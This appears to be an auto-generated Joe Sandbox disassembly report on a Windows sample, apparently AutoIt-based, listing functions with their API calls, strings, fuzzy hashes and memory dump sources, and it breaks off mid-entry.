Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 777d953580471c8d44fdd22b970be311bd6c0524028e95082c99570242fab4b6
Instruction ID: baa2f6644b94808bb00ffd48b06f2e61cc24a2bffbfbcc71d52bcb8d0d9bc0ab
Opcode Fuzzy Hash: 777d953580471c8d44fdd22b970be311bd6c0524028e95082c99570242fab4b6
Instruction Fuzzy Hash: 8B21B374A00208BBDF11ABA0CC85EFEBBB8EF59300F104165BA51972E1DB75991DDA20

Function 00AF9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AF9651
GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9666
_wcscmp.LIBCMT ref: 00AF9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF96F3

Strings

SHELLDLL_DefView, xrefs: 00AF9672
smallicons, xrefs: 00AF96BB
largeicons, xrefs: 00AF9687
details, xrefs: 00AF96A1
list, xrefs: 00AF96D5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 96ed3667432e36c5f7c24989cc1093f3dbc81281b45364312d770a3f05178b7a
Instruction ID: 661d2d8ede9cc963b0de7dadb85c9834542b17855d0bf9e3abf3d681ebf2a82c
Opcode Fuzzy Hash: 96ed3667432e36c5f7c24989cc1093f3dbc81281b45364312d770a3f05178b7a
Instruction Fuzzy Hash: FE110D7714430BBAFE512764EC06FB777ECDB14761B2001A6FF00E50E1FE5159154558

Function 00B18BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B18BEC
CoInitialize.OLE32(00000000), ref: 00B18C19
CoUninitialize.OLE32 ref: 00B18C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00B18D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B18E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B32C0C), ref: 00B18E84
CoGetObject.OLE32(?,00000000,00B32C0C,?), ref: 00B18EA7
SetErrorMode.KERNEL32(00000000), ref: 00B18EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B18F3A
VariantClear.OLEAUT32(?), ref: 00B18F4A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 9a4c5819a8cd3b7b3575c1c0ab9915d6f1f87c2b56eb75d3ac24c588a3f77604
Instruction ID: 2b9675e347042f19f1fd7ab34c053a735cd872b5e90817cfc90fd2ac17c91cb2
Opcode Fuzzy Hash: 9a4c5819a8cd3b7b3575c1c0ab9915d6f1f87c2b56eb75d3ac24c588a3f77604
Instruction Fuzzy Hash: 80C13471208305AFC700EF64C88496BB7E9FF89748F4049ADF5899B260DB71ED46CB52

Function 00B04189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00B0419D
__swprintf.LIBCMT ref: 00B041AA

Part of subcall function 00AC38D8: __woutput_l.LIBCMT ref: 00AC3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00B041D4
LoadResource.KERNEL32(?,00000000), ref: 00B041E0
LockResource.KERNEL32(00000000), ref: 00B041ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00B0420D
LoadResource.KERNEL32(?,00000000), ref: 00B0421F
SizeofResource.KERNEL32(?,00000000), ref: 00B0422E
LockResource.KERNEL32(?), ref: 00B0423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B0429B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 24913991d43604386038704f5d24fd8488bd34a9a3c70f7318011ba3a24687e0
Instruction ID: 1b651004d95baa71c5dd5975d247fd804ff1b88236da4ea9b1c4d88f0bbe3955
Opcode Fuzzy Hash: 24913991d43604386038704f5d24fd8488bd34a9a3c70f7318011ba3a24687e0
Instruction Fuzzy Hash: 46319DB160520AAFCB119F60DD44EBB7BF8EF05341F0085A5FA02E3190DB74DA628BA1

Function 00B016DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B01700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B01714
GetWindowThreadProcessId.USER32(00000000), ref: 00B0171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B0172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B01755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00778,?,00000001), ref: 00B01767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B017CC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 0ddaae985890d6411523dec00959281e919e6329cba7fb4c39561b2cf85f99c9
Instruction ID: 0f2431fcc3f60bb9ad1f82356faeaed698c677912b1e0a417757b4c7892175fa
Opcode Fuzzy Hash: 0ddaae985890d6411523dec00959281e919e6329cba7fb4c39561b2cf85f99c9
Instruction Fuzzy Hash: F931AEB5640204ABEB269F58DD84F793BF9EB19755F1044A8F800872E0DFB89D40CB60

Function 00AAFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAFC06
OleUninitialize.OLE32(?,00000000), ref: 00AAFCA5
UnregisterHotKey.USER32(?), ref: 00AAFDFC
DestroyWindow.USER32(?), ref: 00AE4A00
FreeLibrary.KERNEL32(?), ref: 00AE4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE4A92

Strings

close all, xrefs: 00AAFC01

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f1adcbee9ac144b4be1292a9f05852c450e61a187a3fc9b90916f94c2d8fa1c9
Instruction ID: 343b7d7cd286431a83037edf22380c00cb7ff5d5e4f03a542eff68c0c303fd01
Opcode Fuzzy Hash: f1adcbee9ac144b4be1292a9f05852c450e61a187a3fc9b90916f94c2d8fa1c9
Instruction Fuzzy Hash: FDA14C30701212CFCB29EF55C995E69F778AF09750F1542BDE80AAB2A2DB30AD16CF54

Function 00AFA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00AFAA64), ref: 00AFA9A2

Strings

REGEXPCLASS, xrefs: 00AFA767
CLASS, xrefs: 00AFA721
TEXT, xrefs: 00AFA8D9
CLASSNN, xrefs: 00AFA744
NAME, xrefs: 00AFA7D4
INSTANCE, xrefs: 00AFA8B0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 0fa0d10df2241d23833753fe036c01409d6c847ee3cc4af69e35c6ca64b1f88c
Instruction ID: 5bb9ad5d376d0f29c92e960037c27d56454040a07a1346c2695112b5ee1b4a6d
Opcode Fuzzy Hash: 0fa0d10df2241d23833753fe036c01409d6c847ee3cc4af69e35c6ca64b1f88c
Instruction Fuzzy Hash: EC91A3B1A0020AEADB18DFB0C581FF9FBB4BF14340F518169E99EA7141DB706A59CB91

Function 00AA2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00AA2EAE

Part of subcall function 00AA1DB3: GetClientRect.USER32(?,?), ref: 00AA1DDC
Part of subcall function 00AA1DB3: GetWindowRect.USER32(?,?), ref: 00AA1E1D
Part of subcall function 00AA1DB3: ScreenToClient.USER32(?,?), ref: 00AA1E45

GetDC.USER32 ref: 00ADCF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADCF95
SelectObject.GDI32(00000000,00000000), ref: 00ADCFA3
SelectObject.GDI32(00000000,00000000), ref: 00ADCFB8
ReleaseDC.USER32(?,00000000), ref: 00ADCFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADD04B

Strings

U, xrefs: 00ADCF20

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 34551ad51af17d1a21995fb6a4443f77ad583d3069e06b5cf5e3506df9abea4f
Instruction ID: 310a08697ffa09e05685b9929ddaaada447867b05370052a881c601ea81cbdd5
Opcode Fuzzy Hash: 34551ad51af17d1a21995fb6a4443f77ad583d3069e06b5cf5e3506df9abea4f
Instruction Fuzzy Hash: EA718131500206DFCF319F68C884AFA7BB6FF49364F14426AED565B2A6C7318C92DB60

Function 00B2C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
Part of subcall function 00AA2344: ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B2C2E4
ImageList_EndDrag.COMCTL32 ref: 00B2C2EA
ReleaseCapture.USER32 ref: 00B2C2F0
SetWindowTextW.USER32(?,00000000), ref: 00B2C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B2C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B2C48F

Strings

@GUI_DRAGFILE, xrefs: 00B2C424
@GUI_DROPID, xrefs: 00B2C3E1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: f2d72e5a7669f04014c7f33b6a5ec5015e33588aaa70e8742b0d814c6a215fae
Instruction ID: dc6e9b32950f1fa36ad1bb3881f4e961253073d0fa5dd5f41bc71023e2782af3
Opcode Fuzzy Hash: f2d72e5a7669f04014c7f33b6a5ec5015e33588aaa70e8742b0d814c6a215fae
Instruction Fuzzy Hash: E651A930204301AFDB10EF24D995F6F7BE5EB88310F00896DF9958B2E1DB74A959CB52

Function 00B18F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2F910), ref: 00B1903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2F910), ref: 00B19071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B191EB
SysFreeString.OLEAUT32(?), ref: 00B19215

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 8119b3a9484b68e18ed85947bf4cf9cbfb5013c4371ff8c1e0f0e8cd9b356ce6
Instruction ID: 53bcc9f2cc6b14b3f93d116667147576488e0a209e2b9c465735903cffdd9e5e
Opcode Fuzzy Hash: 8119b3a9484b68e18ed85947bf4cf9cbfb5013c4371ff8c1e0f0e8cd9b356ce6
Instruction Fuzzy Hash: B4F13A71A00209EFDB04DF94C898EEEB7B9FF49714F508499F515AB290CB31AD86CB50

Function 00B1F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B1FD90
CloseHandle.KERNEL32(?), ref: 00B1FDBF
CloseHandle.KERNEL32(?), ref: 00B1FE36

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 72c7b5ea5220535c07f9a24d3263d0eacd9e1ca53b18e7047a8085c50a15aafd
Instruction ID: 3421975fb3e4a3ba083e54314b9f17eeb1f698346c30079af6ef0e67a28bc1ba
Opcode Fuzzy Hash: 72c7b5ea5220535c07f9a24d3263d0eacd9e1ca53b18e7047a8085c50a15aafd
Instruction Fuzzy Hash: E3E18F312042029FC714EF24C991ABBBBE5EF85350F5485ADF8999B2A2DB31DC45CB52

Function 00B04F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B038D3,?), ref: 00B048C7

Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B038D3,?), ref: 00B048E0

Part of subcall function 00B04CD3: GetFileAttributesW.KERNEL32(?,00B03947), ref: 00B04CD4

lstrcmpiW.KERNEL32(?,?), ref: 00B04FE2
_wcscmp.LIBCMT ref: 00B04FFC
MoveFileW.KERNEL32(?,?), ref: 00B05017

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: bb70da91fe14a17e78a6df31d019fe63b13898691351e81efcc9e514b6c1b170
Instruction ID: d6446abee8e5594a0a83da23f99061790d3b8a60ca34cc15c8417814a5e80cf4
Opcode Fuzzy Hash: bb70da91fe14a17e78a6df31d019fe63b13898691351e81efcc9e514b6c1b170
Instruction Fuzzy Hash: 4E5156B24087855BC734DB60D881ADFB7ECDF85340F00496EB289D3191EF74A6488B66

Function 00B288B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B2896E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 484b879390a1ac94c4e728ef33c50aed95121cf63efd3aeb8f8155470d96f8f7
Instruction ID: 8791601c34b53ca8bbcbec4ddad9bd75d10ec49734dd9c631b13d7f7639be30e
Opcode Fuzzy Hash: 484b879390a1ac94c4e728ef33c50aed95121cf63efd3aeb8f8155470d96f8f7
Instruction Fuzzy Hash: 3E51B230501224BBDF309F28EC85BA93BE5FB06310F6041A2F519EB5E1DF71A9908B91

Function 00AA2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC5C0
DestroyIcon.USER32(00000000), ref: 00ADC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC5EC
DestroyIcon.USER32(?), ref: 00ADC5FB

Part of subcall function 00B2A71E: DeleteObject.GDI32(00000000), ref: 00B2A757

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: decbe83a02c53fc0cf23b726145fb66464a51b670bc2cf531bfbc5c0b7aadd72
Instruction ID: 35902236cb4e9af4182ad60e4207301f9a038288a448f2817a27beb10f04d3d5
Opcode Fuzzy Hash: decbe83a02c53fc0cf23b726145fb66464a51b670bc2cf531bfbc5c0b7aadd72
Instruction Fuzzy Hash: 36513B70A40206AFDB24DF28DC45FAA7BB5EB55760F104529F902972E0DBB0ED91DB60

Function 00AF8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

